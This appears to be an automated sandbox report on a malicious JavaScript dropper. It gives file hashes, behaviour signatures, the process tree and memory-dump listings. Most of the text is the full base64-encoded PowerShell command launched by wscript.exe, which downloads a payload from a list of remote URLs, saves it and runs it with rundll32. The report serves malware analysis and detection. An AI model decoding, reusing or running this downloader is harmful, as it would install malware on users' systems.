274e5f57fbd293f8cadfdef9c923ef6989211cc5549458be078f804e4758996d

General

Target

CbFJnkw6DZYnA.js
Size

324KB
MD5

2c22e35b438f197c3d512417678ec8de
SHA1

453a888c7eac9b61f0b65b8296241681ea8ba964
SHA256

274e5f57fbd293f8cadfdef9c923ef6989211cc5549458be078f804e4758996d
SHA512

b6ab37c9731297c65ef7c11a219ff8353939af039a63394f983e895a09dfd58515031b594e0fbd81f18244fbfb1236c76055c7a9bc2b4bffc9a207fb36d678f3
SSDEEP

6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbWwENbj3tg4DZm3hS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygo

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1668	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1668	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 1668	1732	wscript.exe	28
PID 1732 wrote to memory of 1668	1732	wscript.exe	28
PID 1732 wrote to memory of 1668	1732	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\CbFJnkw6DZYnA.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABTAHUAcABlAHIAdgBlAG4AaQBlAG4AdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAUQBBAEwAZwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQAiADsAJABQAGUAcgBvAHYAcwBrAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABnAEEATABnAEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAGsAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAMwBBAEMAOABBAFIAZwBCAFAAQQBDADgAQQBVAHcAQgBpAEEASABFAEEAVwBRAEIAMABBAEEAPQA9AE0AWQBlAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMABBAEcAVQBBAGMAZwBCAHcAQQBIAE0AQQBhAFEAQgBqAEEARwBnAEEAYgB3AEIAeQBBAEcAVQBBAEwAZwBCAGwAQQBIAGcAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAbgBBAEcAVQBBAEwAdwBCAHMAQQBDADgAQQBTAEEAQQA9AE0AWQBlAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAWQBBAFkAUQBCAHkAQQBHAEUAQQBiAGcAQgBuAEEARwBrAEEAWQBRAEIAdQBBAEMANABBAFoAdwBCADEAQQBIAEkAQQBkAFEAQQB2AEEARQA4AEEAUgB3AEIAUABBAEcASQBBAEwAdwBBAHkAQQBFAHcAQQBaAGcAQgB4AEEARwBzAEEATQBZAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMQBBAEMANABBAE4AUQBBADUAQQBDADQAQQBNAGcAQQAwAEEARABBAEEATABnAEEAMQBBAEQATQBBAEwAdwBCADIAQQBDADgAQQBTAFEAQQA9AE0AWQBlAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQAxAEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBNAEEAQQB2AEEARQBZAEEATAB3AEIAagBBAEEAPQA9AE0AWQBlAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATQBnAEEAeABBAEQAWQBBAEwAZwBBAHkAQQBEAEUAQQBPAEEAQQB2AEEARQBFAEEAUwB3AEEAdgBBAEgARQBBAGMAZwBCADEAQQBGAEUAQQBNAFkAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAwAEEAQwA4AEEATwBBAEIAQwBBAEgAbwBBAEwAdwBCADEAQQBHAEUAQQBUAFEAQgB5AEEARQBNAEEATgBRAEIAeQBBAEQAZwBBAFEAUQBCAE8AQQBBAD0APQBNAFkAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAHcAQQB3AEEAQwA4AEEAWQB3AEIARQBBAEYATQBBAGQAUQBCAEgAQQBHAEkAQQBMAHcAQgBoAEEARwBFAEEAWQBRAEIASwBBAEUAWQBBAGIAdwBCAE8AQQBHADgAQQBSAFEAQQB6AEEAQQA9AD0ATQBZAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMAOABBAE4AdwBCADQAQQBIAFkAQQBiAGcAQgBvAEEARABFAEEAVwBRAEEAdgBBAEgARQBBAGEAZwBCAFIAQQBEAEEAQQBkAGcAQgBKAEEARwA0AEEAIgA7ACQASAB5AHAAZQByAGEAZAByAGUAbgBpAGEAUwBhAGMAcgBhAG0AZQBuAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABRAEEATwBRAEEAPQAiADsAJAB2AGEAdQBuAHQAZQBkAEMAYQByAGQAaQBvAHAAdABvAHMAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAeQBBAEcAOABBAGIAQQBCAGgAQQBHADQAQQBaAEEAQgBwAEEARwBNAEEATABnAEIAbwBBAEgAUQBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHIAZQBmAGUAYwB0AEkAbgB0AGUAcgBqAGUAYwB0AGkAbwBuAGEAbABpAHMAZQAgAGkAbgAgACQAUABlAHIAbwB2AHMAawBpAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBNAFkAZQAiACkAIAB7AHQAcgB5ACAAewAkAFAAaQBuAG4AYQB0AGkAcABhAHIAdABpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAWQBBAEwAZwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBaAHMAVQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBaAEEAQgB1AEEARwBVAEEAZQBBAEIAdgBBAEgAQQBBAFoAUQBCADQAQQBIAGsAQQBMAGcAQgBuAEEASABNAEEAWgBzAFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEAdwBBAEMANABBAE4AQQBBADMAQQBDADQAQQBOAGcAQQA1AEEAQwA0AEEATQBRAEEAdwBBAEQASQBBACIAOwAkAGYAbABhAG0AaQBuAGcAbwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAFEAQQAiADsAJABwAHIAZQBzAGMAcgBpAHAAdABpAG8AbgBpAHMAdABJAG4AbwBjAHUAbAB1AG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBlAGYAZQBjAHQASQBuAHQAZQByAGoAZQBjAHQAaQBvAG4AYQBsAGkAcwBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcAByAGUAcwBjAHIAaQBwAHQAaQBvAG4AaQBzAHQASQBuAG8AYwB1AGwAdQBtACAALQBPACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcAGEAcwB0AHIAbwBtAGUAdABlAG8AcgBvAGwAbwBnAGkAcwB0AFUAbgBlAGQAdQBjAGEAdABlAGQAbAB5AC4AdQBuAHQAaQBnAGgAdABDAGEAbgB0AG8AcgBzADsAJABMAG8AZwBoAGUAYQBkAFAAcgBlAGMAbwBuAGcAcgBhAHQAdQBsAGEAdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAdwBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBNAFEAQQAxAEEARABBAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAEEAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAFUAQQBOAFEAQQB1AEEARABrAEEATgBBAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMABBAEcAVQBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgBoAEEARgBBAEEAWQBRAEIAdQBBAEcAYwBBAGQAUQBCAHAAQQBHADQAQQBaAHcAQgAxAEEARwBrAEEATABnAEIAawBBAEcAcwBBACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABcAGEAcwB0AHIAbwBtAGUAdABlAG8AcgBvAGwAbwBnAGkAcwB0AFUAbgBlAGQAdQBjAGEAdABlAGQAbAB5AC4AdQBuAHQAaQBnAGgAdABDAGEAbgB0AG8AcgBzACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA3ADcAMAA5ADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFkAUQBCAHoAQQBIAFEAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAMABBAEcAVQBBAGIAdwBCAHkAQQBHADgAQQBiAEEAQgB2AEEARwBjAEEAYQBRAEIAegBBAEgAUQBBAFYAUQBCAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAVQBBAFoAQQBCAHMAQQBIAGsAQQBMAGcAQgAxAEEARwA0AEEAZABBAEIAcABBAEcAYwBBAGEAQQBCADAAQQBFAE0AQQBZAFEAQgB1AEEASABRAEEAYgB3AEIAeQBBAEgATQBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEAIgA7ACQAdwBoAGkAdABlAHMAdABBAGcAbQBpAG4AYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgAxAEEARwBjAEEAYQBBAEIAaABBAEcASQBBAGIAQQBCAGwAQQBGAEEAQQBaAFEAQgBrAEEASABVAEEAYgBnAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBIAFEAQQBZAFEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAGMAdwBBAD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBBAEEAegBBAEMANABBAE4AQQBBADIAQQBDADQAQQBNAGcAQQAwAEEARABVAEEAUABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQB4AEEAQwA0AEEATgBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAFUAQQBMAGcAQQB5AEEARABNAEEATwBBAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAVQBBAGIAQQBCADAAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAZQBRAEIAQgBBAEgATQBBAGQAQQBCAHkAQQBHADgAQQBiAFEAQgBoAEEARwA0AEEAWQB3AEIAbABBAEgASQBBAEwAZwBCAGoAQQBHADgAQQBiAHcAQgBzAEEAQQA9AD0AIgA7ACQAYgBpAG4AZABpAG4AZwBsAHkAUABlAHQAcgBpAGYAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcARQBBAGMAZwBCAGgAQQBHAGcAQQBhAFEAQgB3AEEASABBAEEAZABRAEIAegBBAEMANABBAFkAdwBCAHYAQQBHADgAQQBiAEEAQQA9AHUAeABPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBOAFEAQQB4AEEAQwA0AEEATwBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAGsAQQB1AHgATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBiAHcAQgB5AEEARwBRAEEAYgB3AEIAagBBAEcAcwBBAFEAZwBCAHkAQQBHAEUAQQBiAGcAQgBqAEEARwBnAEEAYQBRAEIAdgBBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBhAFEAQgBoAEEARwA0AEEATABnAEIAcABBAEgAUQBBAHUAeABPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBNAHcAQQB1AEEARABnAEEATgB3AEEAdQBBAEQAWQBBAE4AUQBBAD0AIgA7ACQAcgBlAG0AbwB2AGUAbABlAHMAcwBOAG8AcgBpAHQAaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBVAEEAYgBnAEIAcgBBAEgASQBBAFkAUQBCAGgAQQBHAHcAQQBMAGcAQgBwAEEASABRAEEAbwBZAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAYwBBAGQAUQBCAGgAQQBIAEkAQQBZAFEAQgB1AEEASABRAEEAYQBRAEIAbABBAEcAUQBBAFUAdwBCADEAQQBHAHcAQQBaAGcAQgB2AEEARwBJAEEAWgBRAEIAdQBBAEgAbwBBAGIAdwBCAHAAQQBHAE0AQQBMAGcAQgB6AEEARwBFAEEAbwBZAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcAVQBBAGIAUQBCAHAAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAZABRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBMAGcAQgBvAEEARwA4AEEAYwB3AEIAMABBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AH0AfQA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1668

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1668-58-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/1668-59-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1668-60-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/1668-61-0x000000000254B000-0x0000000002582000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads